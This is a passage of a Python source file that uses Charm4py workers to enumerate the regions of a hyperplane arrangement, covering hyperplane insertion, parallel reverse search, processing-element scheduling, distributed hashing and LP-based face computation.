out...')\n # return [i.iINT for i in self.hashTable.keys()]\n self.populated = True\n return checkVal\n\n @coro\n def insertHyperplane(self,newA, newb, normalize=1.0, opts={}):\n nrm = np.linalg.norm(np.hstack([-newA.flatten(), newb.flatten()])) / normalize\n newA = -newA.copy().flatten() / nrm\n newb = copy(newb).flatten() / nrm\n self.oldFlippedConstraints = deepcopy(self.flippedConstraints)\n\n self.flippedConstraints.insertHyperplane(newA, newb)\n aug = self.flippedConstraints\n if aug.N == self.oldFlippedConstraints.N:\n self.succGroup.initialize(aug.N, aug, None, awaitable=True).get()\n self.localVarGroup.setConstraintsOnly(aug,awaitable=True).get()\n return True\n\n localOpts = deepcopy(opts)\n localOpts['method'] = 'insertHyperplane'\n localOpts['clearTable'] = False\n localOpts['sendWitness'] = True\n localOpts['sendFaces'] = True\n localOpts['queryReturnInfo'] = True\n tol = opts['tol'] if 'tol' in opts else 1e-9\n rTol = opts['rTol'] if 'rTol' in opts else 1e-9\n solver = localOpts['solver'] if 'solver' in localOpts else 'glpk'\n lpopts = localOpts['lpopts'] if 'lpopts' in localOpts else None\n\n # From now on, we are going to work in CDD format...\n hyper = np.hstack([-newb, newA])\n\n projWb, subIdx = region_helpers.projectConstraints(aug.constraints[:aug.N,:],hyper,tol=tol,rTol=rTol)\n projFixed, _ = region_helpers.projectConstraints(aug.constraints[aug.N:,:],hyper,subIdx=subIdx,tol=tol,rTol=rTol)\n\n if projWb.shape[1] > 1: # Should be equivalent to self.tll.n >= 2\n pt = region_helpers.findInteriorPoint(projFixed,solver=solver,tol=tol,rTol=rTol,lpopts=lpopts)\n hyperSlice = np.hstack([-hyper[1:(subIdx+1)],-hyper[(subIdx+2):]]).reshape(-1,1)\n is1d = False\n else:\n pt = np.array([[hyper[0]/-hyper[1]]],dtype=np.float64)\n if not np.all(projFixed[:,0] >= -self.tol):\n pt = None\n hyperSlice = np.array([[0]],dtype=np.float64)\n is1d = True\n\n if pt is None:\n print(f'Inserted hyperplane doesn\\'t intersect constraint set...')\n return False\n\n print(hyper[1:].shape)\n print(pt.shape)\n\n ptLift = np.zeros((hyper.shape[0]-1,1),dtype=np.float64)\n ptLift[:subIdx,0] = pt[:subIdx,0]\n ptLift[(subIdx+1):,0] = pt[subIdx:,0]\n ptLift[subIdx,0] = (-1/hyper[subIdx+1]) * (-(hyperSlice.reshape(1,-1) @ pt)[0,0] + hyper[0])\n\n print(np.abs(-hyper[1:].reshape(1,-1) @ ptLift - hyper[0]))\n\n newBaseRegFullTup = tuple(np.nonzero((-aug.constraints[:(aug.N-1),1:] @ ptLift - aug.constraints[:(aug.N-1),0].reshape(-1,1)).flatten() >= tol)[0])\n newBaseRegFull = region_helpers.tupToBytes(newBaseRegFullTup, *region_helpers.byteLenFromN(aug.N))\n rebasePt = region_helpers.findInteriorPoint(aug.getRegionConstraints(newBaseRegFullTup),solver=solver,tol=tol,rTol=rTol,lpopts=lpopts)\n if rebasePt is None:\n rebasePt = region_helpers.findInteriorPoint(aug.getRegionConstraints(newBaseRegFullTup + (aug.N-1,)),solver=solver,tol=tol,rTol=rTol,lpopts=lpopts)\n newBaseRegFullTup = newBaseRegFullTup + (aug.N-1,)\n if rebasePt is None:\n print(f'Couldn\\'t find a new rebase point')\n self.flippedConstraints = self.oldFlippedConstraints\n self.oldFlippedConstraints = None\n return False\n\n print(newBaseRegFullTup)\n print(rebasePt)\n\n print(np.allclose(aug.getRegionConstraints(tuple()) , aug.constraints))\n\n # Now we query the poset to find the correct encoding for the region we care about\n # This will be sent with adjUpdate[-1] to bootstrap the process of removing the old node encodings\n f = Future()\n self.distHashTable.initListening(f,queryReturnInfo=True,awaitable=True).get()\n f.get()\n self.succGroup.startListening(awaitable=True).get()\n\n print(f' base N = {aug.baseN} aug.N = {aug.N}')\n\n # Identify the correct encoding of the first region split by the inserted hyperplane (that identified\n # by the point ptLift). That is, determine how many hyperplanes were used to encode this region in the\n # hash table.\n for idx in range(1,aug.N - aug.baseN + 1):\n newBaseReg, newBaseRegTup, newBaseRegN = region_helpers.recodeRegNewN(-idx, newBaseRegFull, aug.N)\n print((newBaseReg, newBaseRegTup, newBaseRegN))\n retVal = self.succGroup[0].query([newBaseReg, newBaseRegTup, newBaseRegN],awaitable=True).get()\n print(retVal)\n if retVal[0] > 0:\n stripNum = idx\n break\n\n self.distHashTable.awaitPending(usePosetChecking=False,awaitable=True).get()\n self.succGroup.sendAll(-2,awaitable=True).get()\n self.succGroup.closeQueryChannels(awaitable=True).get()\n self.succGroup.flushMessages(ret=True).get()\n\n aug.root = tuple(newBaseRegFullTup)\n aug.setRebase(rebasePt)\n self.succGroup.initialize(aug.N, aug, None, awaitable=True).get()\n self.localVarGroup.setConstraintsOnly(aug,awaitable=True).get()\n\n self.distHashTable.setCheckDispatch({'check':'checkForInsert','update':'updateForInsert'},awaitable=True).get()\n\n newAdj = deepcopy(retVal[3])\n newAdj[-1] = (newBaseRegFull,newBaseRegFullTup,aug.N)\n print(newAdj)\n\n self.populated = False\n self.thisProxy.populatePoset(face=set(),witness=rebasePt,adjUpdate=newAdj,payload=retVal[4],opts=localOpts,awaitable=True).get()\n\n # Now that we're all done, restore default dispatch for check/update\n self.distHashTable.setCheckDispatch({'check':'check','update':'update'},awaitable=True).get()\n\n @coro\n def getLPCount(self):\n statsFut = Future()\n self.succGroupFull.getStats(statsFut)\n stats = statsFut.get()\n return stats\n\n @coro\n def populatePosetRS(self,payload=None, opts={}):\n if self.populated:\n return\n self.verbose = True\n defaultSettings = ['verbose']\n for ky in defaultSettings:\n if ky in opts:\n setattr(self,ky,opts[ky])\n\n opts['reverseSearch'] = True\n self.succGroup.setMethod(**opts)\n self.rsPeScheduler.resetScheduler(verbose=self.verbose,awaitable=True).get()\n\n checkVal = True\n level = 0\n thisLevel = [(self.flippedConstraints.root,)]\n posetLen = 1\n timedOut = False\n\n # Start reverse search on the root on the first PE\n peToUse = self.rsPeScheduler.schedNextFreePE(ret=True).get()\n if peToUse >= 0:\n self.succGroup[peToUse].reverseSearch(self.flippedConstraints.root,payload=(tuple() if payload is None else payload),witness=self.flippedConstraints.pt)\n else:\n print('Error: RS Pe scheduler not configured properly')\n\n checkVal = self.rsPeScheduler.awaitResult(awaitable=True).get()\n\n statsFut = Future()\n self.succGroupFull.getStats(statsFut)\n stats = statsFut.get()\n regionDist = self.succGroup.getProperty('rsRegionCount',ret=True).get()\n\n if self.verbose:\n print('Total LPs used: ' + str(stats))\n\n print('Checker returned value: ' + str(checkVal))\n\n # print('Computed a (partial) poset of size: ' + str(len(self.hashTable.keys())))\n print('Computed a (partial) poset of size: ' + str(stats['RSRegionCount']))\n\n print(f'Regions discovered by PE: {regionDist}')\n\n if timedOut:\n print('Poset computation timed out...')\n # return [i.iINT for i in self.hashTable.keys()]\n self.populated = True\n return checkVal\n\n\nclass peSchedulerRS(Chare):\n\n def __init__(self, successorGroup, posetPElist):\n self.succGroup = successorGroup\n self.posetPElist = posetPElist\n self.peFree = copy(self.posetPElist)\n self.resultFut = None\n self.retVal = True\n self.verbose = True\n\n @coro\n def resetScheduler(self,verbose):\n self.verbose = verbose\n self.peFree = copy(self.posetPElist)\n self.succGroup.setPeAvailableRS(True,awaitable=True).get()\n self.resultFut = None\n self.retVal = True\n\n @coro\n def awaitResult(self):\n self.resultFut = Future()\n return self.resultFut.get()\n\n # If there is a PE available, schedule it. If there isn't, return -1 so the successorWorker\n # knows that the scheduling was unsuccessful (as my be the case due to concurrency issues)\n @coro\n def schedNextFreePE(self):\n if not self.retVal:\n return -1\n if len(self.peFree) > 1:\n return self.peFree.pop()\n elif len(self.peFree) == 1:\n lastFreePe = self.peFree.pop()\n self.succGroup.setPeAvailableRS(False,abort=(not self.retVal))\n return lastFreePe\n else:\n return -1\n\n @coro\n def freePe(self,pe):\n # print(f'Free PEs = {self.peFree}; To free = {pe}; retVal = {self.retVal}')\n self.peFree.append(pe)\n if len(self.peFree) == len(self.posetPElist):\n if self.verbose:\n print(f'*** All done! {self.peFree} ***')\n self.resultFut.send(self.retVal)\n self.succGroup.setPeAvailableRS(self.retVal,abort=(not self.retVal))\n\n @coro\n def failAbort(self):\n self.retVal = False\n self.succGroup.setPeAvailableRS(False,abort=True)\n\n # @coro\n # def setrsDone(self):\n # self.succGroup.setrsDone(awaitable=True).get()\n\n\n\nclass successorWorker(Chare):\n\n def initPEs(self,pes,localVarGroup=None,rsScheduler=None):\n self.posetPElist = pes\n self.checkRS= False\n test = getattr(localVarGroup,'checkNodeRS',None)\n if not test is None and callable(localVarGroup.checkNodeRS):\n self.checkRS = True\n self.doRSCleanup = False\n test = getattr(self,'cleanupRS',None)\n if not test is None and callable(self.cleanupRS):\n self.doRSCleanup = True\n self.localVarGroup = localVarGroup\n self.timedOut = False\n self.rsScheduler = rsScheduler\n self.rsPeFree = True\n self.rsDone = False\n self.rsDepth = 0\n self.rsRegionCount = 0\n self.sendFaces = False\n self.sendWitness = False\n self.deferLock = False\n self.hashedNodeCount = 0\n\n def initialize(self,N,constraints,timeout):\n self.workInts = []\n self.N = N\n self.flippedConstraints = constraints\n self.constraints = self.flippedConstraints.constraints\n # self.processNodeSuccessors = partial(successorWorker.processNodeSuccessorsFastLP, self, solver='glpk')\n self.processNodeSuccessors = self.thisProxy[self.thisIndex].processNodeSuccessorsFastLP\n self.processNodesArgs = {'solver':'glpk','ret':True}\n # Defaults to glpk, so this empty call is ok:\n self.lp = encapsulateLP.encapsulateLP()\n self.lpIntPoint = encapsulateLP.encapsulateLP()\n self.rsLP = encapsulateLP.encapsulateLP()\n self.rsLPIntPoint = encapsulateLP.encapsulateLP()\n # self.hashChannels = []\n self.clockTimeout = (timeout + time.time()) if timeout is not None else None\n self.timedOut = False\n self.stats = {'LPSolverCount':0, 'xferTime':0, 'numQueries':0, 'successfulQueries':0, 'RSRegionCount':0, 'RSLPCount':0}\n self.rsPeFree = True\n self.rsDone = False\n self.rsDepth = 0\n self.rsRegionCount = 0\n @coro\n def getTimeout(self):\n return self.timedOut\n\n def setMethod(self,method='fastLP',solver='glpk',useQuery=False,lpopts={},reverseSearch=False,hashStore='bits',tol=1e-9,rTol=1e-9,sendFaces=False,clearTable='speed',sendWitness=False,verbose=True):\n self.lp.initSolver(solver=solver, opts={'dim':(self.constraints.shape[1]-1)})\n self.lpIntPoint.initSolver(solver=solver, opts={'dim':(self.constraints.shape[1])})\n self.rsLP.initSolver(solver=solver, opts={'dim':(self.constraints.shape[1]-1)})\n self.rsLPIntPoint.initSolver(solver=solver, opts={'dim':(self.constraints.shape[1])})\n self.useQuery = useQuery\n self.doRS = reverseSearch\n self.tol = tol\n self.rTol = rTol\n self.sendFaces = sendFaces\n self.clearTable = clearTable\n self.sendWitness = True if sendWitness else None\n self.verbose = verbose\n if hashStore == 'bits':\n self.hashStoreMode = 0\n elif hashStore == 'list':\n self.hashStoreMode = 1\n elif hashStore == 'vertex':\n self.hashStoreMode = 2\n else:\n self.hashStoreMode = 0\n if method=='cdd':\n self.processNodeSuccessors = self.thisProxy[self.thisIndex].processNodeSuccessorsCDD\n self.processNodesArgs = {'solver':solver}\n if self.hashStoreMode == 2:\n print(f'WARNING: vertex region encodings are not supported for method {method}. Defaulting to bit region encodings...')\n elif method=='fastLP':\n self.processNodeSuccessors = self.thisProxy[self.thisIndex].processNodeSuccessorsFastLP\n self.processNodesArgs = {'solver':solver}\n if self.hashStoreMode == 2:\n print(f'WARNING: vertex region encodings are not supported for method {method}. Defaulting to bit region encodings...')\n elif method=='insertHyperplane':\n self.processNodeSuccessors = self.thisProxy[self.thisIndex].processNodeSuccessorsInsertHyperplane\n self.processNodesArgs = {'solver':solver}\n if len(lpopts) == 0:\n self.lpopts = {}\n else:\n self.lpopts = deepcopy(lpopts)\n if solver != 'glpk' and not 'fallback' in self.lpopts:\n self.lpopts['fallback'] = {'solver':'glpk'}\n self.lpopts['solver'] = solver\n self.processNodesArgs['lpopts'] = self.lpopts\n self.processNodesArgs['ret'] = True\n self.method = method\n self.solver = solver\n\n self.Hcol0Close = self.tol + self.rTol * np.abs(self.constraints[:,0])\n self.Hcol0CloseVertex = self.constraints[:,0] - self.Hcol0Close\n\n @coro\n def setProperty(self,prop,val):\n setattr(self,prop,val)\n\n @coro\n def getProperty(self,prop):\n return getattr(self,prop)\n\n @coro\n def setPeAvailableRS(self,status,abort=False):\n self.rsPeFree = status\n if abort:\n self.rsDone = True\n\n @coro\n def getStats(self, statsFut):\n if charm.myPe() in self.posetPElist:\n self.stats['LPSolverCount'] = self.lp.lpCount + self.lpIntPoint.lpCount\n self.stats['RSRegionCount'] = self.rsRegionCount\n self.stats['RSLPCount'] = self.rsLP.lpCount + self.rsLPIntPoint.lpCount\n retVal = defaultdict(int) if not charm.myPe() in self.posetPElist else self.stats\n self.reduce(statsFut,retVal,DictAccum)\n\n @coro\n def getProxies(self):\n return self.thisProxy[self.thisIndex]\n @coro\n def initHashChannel(self, procGroupProxies):\n if not charm.myPe() in self.posetPElist:\n return\n self.numHashWorkers = len(procGroupProxies)\n self.hashChannels = [Channel(self, remote=proxy) for proxy in procGroupProxies]\n self.numHashBits = 1\n while self.numHashBits < self.numHashWorkers:\n self.numHashBits = self.numHashBits << 1\n self.hashMask = self.numHashBits - 1\n self.numHashBits -= 1\n # if self.N % 4 == 0:\n # self.numBytes = self.N/4\n # else:\n # self.numBytes = int(self.N/4)+1\n # print(self.hashChannels)\n\n @coro\n def initQueryChannel(self, procGroupProxies, distHashProxy):\n if not charm.myPe() in self.posetPElist:\n return\n # self.numHashWorkers = len(procGroupProxies)\n self.queryChannels = [Channel(self, remote=proxy) for proxy in procGroupProxies]\n self.queryMutexChannel = None\n if not self.rateChannel is None:\n self.queryMutexChannel = Channel(self, remote=distHashProxy)\n # self.numHashBits = 1\n # while self.numHashBits < self.numHashWorkers:\n # self.numHashBits = self.numHashBits << 1\n # self.hashMask = self.numHashBits - 1\n # self.numHashBits -= 1\n # if self.N % 4 == 0:\n # self.numBytes = self.N/4\n # else:\n # self.numBytes = int(self.N/4)+1\n # print(self.hashChannels)\n\n @coro\n def closeQueryChannels(self):\n if not charm.myPe() in self.posetPElist:\n return\n for ch in self.queryChannels:\n ch.send(-2)\n if not self.queryMutexChannel is None:\n self.queryMutexChannel.send(-2)\n\n @coro\n def initRateChannel(self,overlapPElist ):\n self.rateChannel = None\n self.overlapPElist = overlapPElist\n if not charm.myPe() in self.posetPElist:\n return\n if charm.myPe() in overlapPElist:\n self.rateChannel = Channel(self,remote=overlapPElist[charm.myPe()][1])\n # self.feedbackChannel = Channel(self,remote=proxy)\n @coro\n def testSend(self):\n for k in range(self.numHashWorkers):\n #print('Sending on to ' + str(k))\n #print(self.hashChannels[k])\n self.hashChannels[k].send((self.thisIndex,k))\n #print('Message sent!')\n\n def startListening(self):\n self.hashedNodeCount = 0\n if not charm.myPe() in self.posetPElist:\n return\n for ch in self.hashChannels:\n ch.send(-100)\n\n def hashNode(self,toHash,payload=None,vertex=None,adjUpdate=False):\n # hashInt = int(posetFastCharm_numba.hashNodeBytes(np.array(toHash[0],dtype=np.uint8)))\n # hashInt = hashNodeBytes(np.array(toHash[0],dtype=np.uint8))\n hashInt = hashNodeBytes(toHash[0])\n if self.hashStoreMode == 0:\n regEncode = toHash[0]\n elif self.hashStoreMode == 1:\n regEncode = tuple(toHash[1])\n elif self.hashStoreMode == 2 and vertex is not None:\n regEncode = vertex\n else:\n # default to tuple mode\n regEncode = tuple(toHash[1])\n N = toHash[2]\n if len(toHash) >= 4:\n face = toHash[3]\n else:\n face = tuple()\n if len(toHash) >= 5:\n witness = toHash[4]\n else:\n witness = None\n if payload is not None:\n return ( (hashInt & self.hashMask) % self.numHashWorkers , hashInt >> self.numHashBits, regEncode, N, charm.myPe(), face, witness, adjUpdate, payload)\n else:\n return ( (hashInt & self.hashMask) % self.numHashWorkers , hashInt >> self.numHashBits, regEncode, N, charm.myPe(), face, witness, adjUpdate )\n\n @coro\n def hashAndSend(self,toHash,payload=None,vertex=None,adjUpdate=False):\n self.hashedNodeCount += 1\n val = self.hashNode(toHash,payload=payload,vertex=vertex,adjUpdate=adjUpdate)\n self.hashChannels[val[0]].send(val)\n # print('Trying to hash integer ' + str(nodeInt))\n # retVal = self.thisProxy[self.thisIndex].deferControl(code=5,ret=True).get()\n retVal = self.thisProxy[self.thisIndex].deferControl(ret=True).get()\n # print('Saw defercontrol return the following within HashAndSend ' + str(retVal))\n return retVal\n @coro\n def getHashedNodeCount(self):\n return self.hashedNodeCount\n @coro\n def resetHashedNodeCount(self):\n self.hashedNodeCount = 0\n @coro\n def decHashedNodeCount(self):\n self.hashedNodeCount -= 1\n\n def decodeRegionStore(self,INTrep):\n if type(INTrep) == tuple and len(INTrep) == 2 and type(INTrep[1]) is tuple:\n incommingINTrep = INTrep\n Hsol = (-self.constraints[:,1:] @ INTrep[0]).flatten()\n flipIdxs = (Hsol > self.Hcol0CloseVertex).flatten().astype(np.bool8)\n # print(flipIdxs)\n intersectionIdxs = np.nonzero((np.abs(Hsol - self.constraints[:,0]) <= self.Hcol0Close).flatten())[0]\n # print(intersectionIdxs)\n flipIdxs[intersectionIdxs] = np.zeros(intersectionIdxs.shape,dtype=np.bool8)\n flipIdxs[list(INTrep[1])] = np.ones(len(INTrep[1]),dtype=np.bool8)\n INTrep = tuple(np.nonzero(flipIdxs)[0])\n # print(f'{INTrep}==>{(incommingINTrep[0].flatten().tolist(),incommingINTrep[1])}')\n if type(INTrep) == tuple:\n intIdxNoFlip = list(INTrep)\n boolIdxNoFlip = tupToBytes(INTrep, self.flippedConstraints.wholeBytes, self.flippedConstraints.tailBits)\n intIdx = list(range(self.N))\n # boolIdx[-1] = boolIdx[-1] & ((1<<(self.tailBits+1))-1)\n for unflipIdx in range(len(INTrep)-1,-1,-1):\n intIdx.pop(INTrep[unflipIdx])\n # boolIdxNoFlip = np.full(self.N,False,dtype=bool)\n # boolIdxNoFlip[INTrep,] = np.full(len(INTrep),True,dtype=bool)\n # intIdx = np.where(boolIdxNoFlip==0)[0]\n # boolIdxNoFlip = np.packbits(boolIdxNoFlip,bitorder='little')\n elif type(INTrep) == bytearray:\n boolIdxNoFlip = INTrep\n INTrep = bytesToList(boolIdxNoFlip, self.flippedConstraints.wholeBytes, self.flippedConstraints.tailBits)\n intIdxNoFlip = INTrep\n INTrep = tuple(intIdxNoFlip)\n intIdx = list(range(self.N))\n # boolIdx[-1] = boolIdx[-1] & ((1<<(self.tailBits+1))-1)\n for unflipIdx in range(len(INTrep)-1,-1,-1):\n intIdx.pop(INTrep[unflipIdx])\n\n return INTrep, boolIdxNoFlip, intIdx, intIdxNoFlip\n\n @coro\n def deferControl(self, code=1):\n if not self.rateChannel is None:\n while self.deferLock:\n suspendFut = Future()\n suspendFut.send(1)\n suspendFut.get()\n self.deferLock = True\n self.rateChannel.send(code)\n control = self.rateChannel.recv()\n while control > 0:\n control = self.rateChannel.recv()\n if control == -3:\n self.deferLock = False\n return False\n self.deferLock = False\n return True\n\n @coro\n def query(self, q, op=None):\n qOp = 0\n if isinstance(op,int):\n qOp = op\n # print('PE' + str(charm.myPe()) + ' Query to send is ' + str(q))\n self.stats['numQueries'] += 1\n val = self.hashNode(q)\n self.queryChannels[val[0]].send((qOp,) + val)\n # print('PE' + str(charm.myPe()) + ' sending query ' + str(val))\n if not self.queryMutexChannel is None:\n self.queryMutexChannel.send(charm.myPe())\n # print('Waiting for query mutex on PE ' + str(charm.myPe()))\n self.queryMutexChannel.recv()\n # print('Received query mutex on PE ' + str(charm.myPe()))\n if charm.myPe() == val[0]:\n self.thisProxy[self.thisIndex].deferControl(code=3,ret=True).get()\n # print('Got Control Back from self query')\n else:\n self.thisProxy[self.thisIndex].deferControl(code=4,ret=True).get()\n # print('Got Control Back.')\n self.queryMutexChannel.send(1)\n retVal = self.queryChannels[val[0]].recv()\n # print('^^^^^^ Received answer to query ' + str(q) + ' of ' + str(retVal))\n if retVal[0] > 0:\n self.stats['successfulQueries'] += 1\n return retVal\n\n @coro\n def tester(self):\n print('Entered tester on PE ' + str(charm.myPe()))\n return charm.myPe()\n # @coro\n # def initList(self,workInts):\n # self.status = Future()\n # self.workInts = workInts\n # self.status.send(1)\n\n @coro\n def initListNew(self,workInts, fut):\n self.workInts = workInts\n # print(self.workInts)\n fut.send(1)\n\n @coro\n def initList(self,fut):\n self.workInts = []\n fut.send(1)\n\n @coro\n def appendToWorkList(self,li,fut):\n self.workInts.extend(li)\n fut.send(len(li))\n\n #@coro\n def sendAll(self,val):\n if not charm.myPe() in self.posetPElist:\n return\n for ch in self.hashChannels:\n ch.send(val)\n\n @coro\n def flushMessages(self):\n if not charm.myPe() in self.overlapPElist:\n return\n self.rateChannel.send(2)\n\n\n\n @coro\n def computeSuccessorsNew(self):\n term = False\n if len(self.workInts) > 0:\n successorList = [[None,None,None,None,None,None,None] for k in range(len(self.workInts))]\n for ii in range(len(successorList)):\n successorList[ii] = self.processNodeSuccessors(self.workInts[ii][0],self.N,self.constraints,**self.processNodesArgs,witness=self.workInts[ii][4], payload=self.workInts[ii][6],xN=self.workInts[ii][1],face=self.workInts[ii][3],adj=self.workInts[ii][5], awaitable=True).get()\n self.timedOut = (time.time() > self.clockTimeout) if self.clockTimeout is not None else False\n # print('Working on ' + str(self.workInts[ii]) + 'on PE ' + str(charm.myPe()) + '; with timeout ' + str(self.timedOut))\n if type(successorList[ii][1]) is int or self.timedOut:\n term = True\n if self.timedOut:\n successorList[ii][1] = -1\n break\n else:\n successorList = [[set([]),-1]]\n\n # self.thisProxy[self.thisIndex].sendAll(-2 if not term else -3, awaitable=True).get()\n if term:\n self.thisProxy[self.thisIndex].sendAll(-3, awaitable=True).get()\n self.thisProxy[self.thisIndex].flushMessages(awaitable=True).get()\n\n\n self.workInts = [successorList[ii][1] for ii in range(len(successorList))]\n # successorList = [successorList[ii][0] for ii in range(len(successorList))]\n\n @coro\n def reverseSearch(self,INTrep,payload=None,witness=None):\n #print(f'PE {charm.myPe()}: working on {INTrep}')\n #print(f'PE {charm.myPe()} working on region {INTrep}')\n if self.rsDone:\n if self.rsDepth == 0:\n self.rsScheduler.freePe(charm.myPe(),awaitable=True).get()\n return\n\n self.rsDepth += 1\n\n if self.checkRS:\n # INTrep2, boolIdxNoFlip, intIdx, intIdxNoFlip = self.decodeRegionStore(INTrep)\n tempRetVal = self.localVarGroup[charm.myPe()].checkNodeRS(INTrep,payload=payload, witness=witness, ret=True).get()\n # print(f'{charm.myPe()} --> INTrep = {INTrep2}; boolIdxNoFlip = {boolIdxNoFlip}; intIdx = {intIdx}; intIdxNoFlip = {intIdxNoFlip}; witness = {witness}; retVal = {tempRetVal}')\n if not tempRetVal:\n self.rsDone = True\n self.rsPeFree = False\n self.rsDepth -= 1\n self.rsScheduler.failAbort()\n if self.rsDepth == 0:\n self.rsScheduler.freePe(charm.myPe(),awaitable=True).get()\n return\n # Compute all of the adjacent nodes (from among the unflipped hyperplanes)\n H2 = self.constraints.copy()\n successorList, _, witnessList = self.processNodeSuccessors(INTrep,self.N,H2,**self.processNodesArgs,payload=payload,witness=witness).get()\n if type(witnessList) is list and len(witnessList) == len(successorList):\n findWitnessLocally = False\n else:\n #print(f'PE {charm.myPe()}: successorList = {successorList}; witnessList = {witnessList}')\n findWitnessLocally = True\n witnessList = []\n #print(f'PE {charm.myPe()}: successors of {INTrep} are {successorList}')\n self.rsRegionCount += 1\n #print(f'PE {charm.myPe()} working on region {INTrep}; found successors {successorList}')\n\n for ii in range(len(successorList)):\n # Put check for path to root here...\n H = self.constraints.copy()\n H[successorList[ii][1],:] = -H[successorList[ii][1],:]\n if findWitnessLocally:\n interiorPoint = region_helpers.findInteriorPoint(H,lpObj=self.rsLPIntPoint,lpopts=self.lpopts)\n witnessList.append(interiorPoint)\n else:\n interiorPoint = witnessList[ii]\n # If the ray connecting interiorPoint to the origin point doesn't pass through the current\n # face, then we shouldn't explore this region from *the current* region (another will count it)\n # This face is stored in the third position of an element of successorList\n if interiorPoint is None:\n print(f'PE {charm.myPe()}: Something went wrong for region {INTrep}')\n else:\n rayEval = (H[:,0] + (H[:,1:] @ interiorPoint).flatten()).flatten() / (-H[:,1:] @ (-interiorPoint + self.flippedConstraints.pt)).flatten()\n #print(rayEval)\n rayScalar = np.min( np.where( rayEval < 0, np.inf, rayEval ) )\n rayHit = interiorPoint + rayScalar * (self.flippedConstraints.pt - interiorPoint)\n\n H2[INTrep,:] = -H2[INTrep,:]\n currentRegionIsParent = np.all(-H2[:,1:] @ rayHit - H2[:,0].reshape(-1,1) <= self.tol + self.rTol * np.abs(H2[:,0].reshape(-1,1)))\n H2[INTrep,:] = -H2[INTrep,:]\n if currentRegionIsParent:\n #print(f'PE {charm.myPe()}: Visiting {successorList[ii][1]}')\n peToUse = -1\n if self.rsPeFree and not self.rsDone:\n peToUse = self.rsScheduler.schedNextFreePE(ret=True).get()\n if peToUse >= 0:\n self.thisProxy[peToUse].reverseSearch(successorList[ii][1],payload=successorList[ii][6],witness=interiorPoint)\n else:\n self.thisProxy[self.thisIndex].reverseSearch(successorList[ii][1],payload=successorList[ii][6],witness=interiorPoint,awaitable=True).get()\n if self.doRSCleanup:\n self.thisProxy[self.thisIndex].cleanupRS(successorList,witnessList,awaitable=True).get()\n self.rsDepth -= 1\n if self.rsDepth == 0:\n self.rsScheduler.freePe(charm.myPe(),awaitable=True).get()\n return\n\n\n\n @coro\n def retrieveFaces(self,fut):\n fut.send( (charm.myPe(), self.workInts) )\n\n @coro\n def processNodeSuccessorsCDD(self,INTrep,N,H2,solver='glpk'):\n H = copy(H2)\n # global H2\n # H = np.array(H2)\n # H = np.array(processNodeSuccessors.H)\n idx = 1\n for i in range(N):\n if INTrep & idx > 0:\n H[i] = -1*H[i]\n idx = idx << 1\n\n mat = cdd.Matrix(H,number_type='float')\n mat.rep_type = cdd.RepType.INEQUALITY\n ret = mat.canonicalize()\n to_keep = sorted(list(frozenset(range(len(H))) - ret[1]))\n if len(ret[0]) > 0:\n orig_to_keep = to_keep\n # There is some degeneracy, which means CDD screwed up (numerical ill-conditioning?)\n # Hence, we will use a direct implementation to find a minimal H-Representation\n to_keep = self.concreteMinHRep(H,copyMat=False,solver=solver)\n if orig_to_keep != to_keep:\n print('Linear regions found? ' + ('YES' if len(ret[0])>0 else 'NO'))\n print('CDD-obtained to_keep was:')\n print(orig_to_keep)\n print('GLPK Simplex-based Minimal H-Representation yielded to_keep of:')\n print(to_keep)\n # Use this to keep track of the region's faces\n facesInt = 0\n for k in to_keep:\n facesInt = facesInt + (1 << k)\n\n successors = []\n for i in range(len(to_keep)):\n if to_keep[i] >= N:\n break\n idx = 1 << to_keep[i]\n if idx & INTrep <= 0:\n successors.append( \\\n INTrep + idx \\\n )\n cont = self.thisProxy[self.thisIndex].hashAndSend(INTrep + idx,ret=True).get()\n if not cont:\n return [set(successors), -1]\n\n return [set(successors), facesInt]\n\n\n @coro\n def concreteMinHRep(self,H2,constraint_list_in,boolIdxNoFlip,intIdxNoFlip,intIdx,solver='glpk',interiorPoint=None):\n witnessList = []\n safe = False\n if len(intIdx) == 0:\n return [], []\n\n restricted = False if constraint_list_in is None else True\n\n # H2 should be a view into the CDD-formatted H matrix selected by taking boolIdx or intIdx rows thereof\n if interiorPoint is not None:\n H = H2 if not restricted else H2[constraint_list_in[0:len(H2)],:]\n else:\n # This version of H has an extra row, that we can use for the another constraint\n H = np.vstack([H2, [H2[0,:]] ]) if not restricted else np.vstack([H2[constraint_list_in,:], [H2[0,:]] ])\n\n to_keep = []\n constraint_list = np.full(len(H),True,dtype=bool)\n if restricted:\n restIdxs = np.nonzero(constraint_list_in)[0]\n offsetTab = dict(zip(restIdxs,range(len(restIdxs))))\n for idx in range(len(intIdx)):\n if restricted and (not constraint_list_in[intIdx[idx]]):\n continue\n offsetIdx = intIdx[idx] if not restricted else offsetTab[intIdx[idx]]\n if self.useQuery:\n boolIdxNoFlip[intIdx[idx]//8] = boolIdxNoFlip[intIdx[idx]//8] | (1<<(intIdx[idx]%8))\n insertIdx = 0\n while insertIdx < len(intIdxNoFlip) and intIdxNoFlip[insertIdx] < intIdx[idx]:\n insertIdx += 1\n temp = copy(intIdxNoFlip)\n temp.insert(insertIdx,intIdx[idx])\n # q = self.thisProxy[self.thisIndex].query( bytes(np.packbits(boolIdx,bitorder='little')), ret=True).get()\n q = self.thisProxy[self.thisIndex].query( [boolIdxNoFlip, tuple(temp), self.flippedConstraints.N], ret=True).get()\n boolIdxNoFlip[intIdx[idx]//8] = boolIdxNoFlip[intIdx[idx]//8] ^ (1<<(intIdx[idx]%8))\n # print('PE' + str(charm.myPe()) + ' Queried table with node ' + str(origInt) + ' and received reply ' + str(q))\n # If the node corresponding to the hyperplane we're about to flip is already in the table\n # then treat it as redundant and skip it (saving the LP)\n if q[0] > 0:\n continue\n if interiorPoint is None:\n # Set the extra row to the negation of the pre-relaxed current constraint\n H[-1,:] = -H2[intIdx[idx],:]\n H[offsetIdx,0] += 1\n status, x = self.lp.runLP( \\\n H2[intIdx[idx],1:], \\\n -H[constraint_list,1:], \\\n H[constraint_list,0], \\\n lpopts = self.lpopts, \\\n msgID = str(charm.myPe()) \\\n )\n H[offsetIdx,0] -= 1\n\n if status != 'optimal' and (safe or status != 'primal infeasible') and status != 'dual infeasible':\n print('******************** PE' + str(charm.myPe()) + ' WARNING!! ********************')\n print('PE' + str(charm.myPe()) + ': Infeasible or numerical ill-conditioning detected at node' )\n print('PE ' + str(charm.myPe()) + ': RESULTS MAY NOT BE ACCURATE!!')\n return [set([]), 0]\n if (safe and -H2[intIdx[idx],1:]@x < H2[intIdx[idx],0]) \\\n or (not safe and (status == 'primal infeasible' or 